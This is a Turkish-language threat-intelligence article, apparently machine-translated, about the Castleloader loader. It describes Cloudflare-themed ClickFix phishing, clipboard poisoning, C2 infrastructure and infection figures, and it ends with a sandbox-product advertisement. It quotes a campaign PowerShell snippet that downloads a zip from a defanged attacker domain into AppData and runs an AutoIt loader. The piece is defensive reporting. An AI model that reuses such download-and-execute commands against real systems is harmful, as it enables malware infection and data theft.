2025 yılında keşfedilen hızla gelişen bir yükleyici olan Castleloader, Cloudflare temalı “ClickFix” kimlik avı sayfalarını ve Windows ana bilgisayarlarını tehlikeye atmak için Github depolarını silahlandırarak yeraltı ağlarında yükseldi.
Kötü amaçlı yazılım, benign geliştirici kaynakları, tarayıcı güncellemeleri veya portallarla karşılaşır, şüphesiz kullanıcıları site erişimini “doğrulamayı” veya “onarmayı” vaat eden görünüşte masum bir PowerShell komutunu kopyalamaya çeker.
Bir kez yürütüldüğünde, bu tek çizgi sessizce Castleloader’ı makineye çeker ve Stealc ve Redline gibi bilgi çalıcıların yanı sıra Netsupport Rat ve Sectoprat gibi uzaktan erişimli truva atlarının kapısını açar.
Tehditin kapsamı önemlidir: Mayıs ve Temmuz 2025 arasında araştırmacılar, kötü amaçlı bağlantıları tıklayan kullanıcılar arasında 1.634 kötü amaçlı yazılım denemesi ve 469 onaylanmış enfeksiyon kaydetti.
Katalizör analistleri, birçoğu Amerika Birleşik Devletleri’ndeki hükümet ağlarını hedefleyen bu kampanyaları koordine eden en az yedi farklı komuta ve kontrol (C2) sunucusu belirledi.
Gözlenen her dalgada, Castleloader, her bir kurbanın profiline göre ikincil yükleri dinamik olarak seçerek ortak teslimat merkezi olarak hizmet etti.
.webp)
Catalyst araştırmacıları, platformun web tabanlı C2 panelinin, istatistikler, coğrafi filtreler ve halihazırda tehlikeye atılan sistemlere tek tıklamayla yeniden düzenleme ile birlikte hizmet olarak kötü amaçlı bir yazılım gösterge tablosunu yansıttığını belirtti.
Operatörler bir “teslimat” modülüne yeni ikili dosyaları yükler ve ardından PowerShell’i URL parametrelerine yerleştiren ve ana bilgisayar sitelerine dokunmadan kampanya değişikliklerine izin veren görevler oluşturur.
Sonuç, saldırganların birkaç dakika içinde yinelemesine izin verirken, çekilişleri hayal kırıklığına uğratan esnek bir altyapıdır.
ClickFix enfeksiyon mekanizmasının içinde
Castleloader’ın ayırt edici özelliği, pano zehirlenmesi “ClickFix” rutinidir. Bir kurban sahte bulutflare doğrulama sayfasını yüklediğinde, gömülü javascript sessizce sorunlar /s.php?an=0 Base64 kodlu bir PowerShell yükünü almak ve onu panoya kopyalamak için unsecuredCopyToClipboard().
.webp)
Kullanıcılar, kodu Windows Run iletişim kutusuna yapıştırmak için ekrandaki talimatlara uyarak bir sonraki aşamayı tetikleyerek:-
# Snippet excerpted from teamsi.org campaign
[System.Guid]$GDSGFBKSD = [System.Guid]::NewGuid().ToString();
$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;
Invoke-WebRequest 'https://teamsap[.]org/s.php?an=2' -OutFile "$env:MYAPPDATA\$GDSGFBKSD.zip";
Expand-Archive "$env:MYAPPDATA\$GDSGFBKSD.zip" -DestinationPath "$env:MYAPPDATA";
& "$env:MYAPPDATA\loader.au3";Bu komut dosyası, kampanyaya özgü bir zip getirir, bir otomatik yükleyiciyi açar ve son yükü almak için HTTPS üzerinden C2 ile temasa geçmeden önce karma API adlarını çözen kabuk kodu yürütür.
Meşru görünümlü alanlar ve meşru araçlar (AUTOIT) aracılığıyla indirmeler düzenleyerek, Castleloader minimal disk artefaktları bırakırken birçok içerik filtresini kaldırır.
Daha fazla kalıcılık isteğe bağlıdır, ancak güçlüdür: C2, kaçırılan ana bilgisayarlara planlanmış görevler oluşturma, DLL’leri güvenilir süreçlere enjekte etmeleri veya bir kullanıcı oturum açtığında tekrar tekrar yeniden yüklemeleri için talimat verebilir.
Görevler sunucudan gerçek zamanlı olarak yüklendiğinden, savunucular statik göstergelere güvenemezler, bunun yerine pano manipülasyonunu ve ardından giden PowerShell trafiğini işaretleyen davranışsal algılama, erken bozulma şansını sunar.
Gerçek zamanlı sanal alan analizi ile daha hızlı, daha doğru kimlik avı tespiti ve işletmeniz için gelişmiş koruma deneyimi-> Herhangi birini deneyin. Şimdi